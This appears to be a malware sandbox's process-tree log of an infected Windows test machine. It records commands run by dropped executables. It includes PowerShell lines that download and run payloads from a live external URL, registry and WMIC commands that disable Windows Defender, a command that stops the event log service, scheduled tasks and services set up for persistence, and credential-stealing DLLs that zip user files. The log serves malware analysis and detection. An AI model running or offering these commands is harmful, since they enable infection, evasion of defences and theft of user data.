C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsgC833.tmp\app.bat"3⤵PID:452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\i1.exei1.exe /SUB=2838 /str=one4⤵
- Executes dropped EXE
PID:2392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000', 'i2.bat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K i2.bat4⤵PID:2428
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\LQqqtdauwz_TaOPIC8mm6Hjp.exeC:\Users\Admin\Documents\SimpleAdobe\LQqqtdauwz_TaOPIC8mm6Hjp.exe2⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3564
-
-
C:\Users\Admin\Documents\SimpleAdobe\yKsQAHMXBlFSnpcJZJgnuybp.exeC:\Users\Admin\Documents\SimpleAdobe\yKsQAHMXBlFSnpcJZJgnuybp.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4544 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
PID:5004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
PID:4592
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
PID:2520
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\oMHmKV4qin2yV3RMkuUNiFFg.exeC:\Users\Admin\Documents\SimpleAdobe\oMHmKV4qin2yV3RMkuUNiFFg.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe.\Install.exe /ddidy "525403" /S4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:4388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:1464
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:3812
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:912
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2476
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:2576
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:5052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:4108
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:3380
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:3312
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:4932
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:3776
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:4272
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:2764
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1488
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:2488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:3380
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:3052
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:8
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe\" LY /nlfdidcOwS 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5308
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"5⤵PID:6128
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵PID:6208
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ7⤵PID:6820
-
-
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\2MEnKpVWLRc5SpDj8qnnOcHN.exeC:\Users\Admin\Documents\SimpleAdobe\2MEnKpVWLRc5SpDj8qnnOcHN.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4756 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\LPlVCrUtq4IcBRge6e7zsGdp.exeC:\Users\Admin\Documents\SimpleAdobe\LPlVCrUtq4IcBRge6e7zsGdp.exe2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\DzvelfwNBvxbZcdOhY3K.exe"C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\DzvelfwNBvxbZcdOhY3K.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"5⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6276 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2456 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main7⤵
- Loads dropped DLL
PID:5460 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main8⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5488 -
C:\Windows\system32\netsh.exenetsh wlan show profiles9⤵PID:1008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\720366693769_Desktop.zip' -CompressionLevel Optimal9⤵
- Command and Scripting Interpreter: PowerShell
PID:1180
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main7⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000020001\0befa0bcc7.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\0befa0bcc7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4672
-
-
C:\Users\Admin\1000021002\f7da420337.exe"C:\Users\Admin\1000021002\f7da420337.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6956 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account6⤵
- Drops file in Program Files directory
PID:6440 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5fb9cc40,0x7ffe5fb9cc4c,0x7ffe5fb9cc587⤵PID:6588
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_38df83dfe9ed9bb5b7c2e2e32d8073da LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4628
-
-
C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\6wbSPhvgKkCnr8XAmJUX.exe"C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\6wbSPhvgKkCnr8XAmJUX.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:704 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵PID:2484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe634746f8,0x7ffe63474708,0x7ffe634747185⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,12600105987800960233,17459360173126500833,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:25⤵PID:5684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,12600105987800960233,17459360173126500833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5696
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵PID:2472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffe634746f8,0x7ffe63474708,0x7ffe634747185⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4306063837110901017,5512251621017414283,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:25⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4306063837110901017,5512251621017414283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5652
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1004 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe634746f8,0x7ffe63474708,0x7ffe634747185⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:25⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:85⤵PID:5744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:15⤵PID:5132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:15⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:15⤵PID:1772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:15⤵PID:6116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:15⤵PID:6348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:15⤵PID:6384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2516 /prefetch:25⤵PID:6816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,8315328421306489235,8353884928698180688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:85⤵PID:4320
-
-
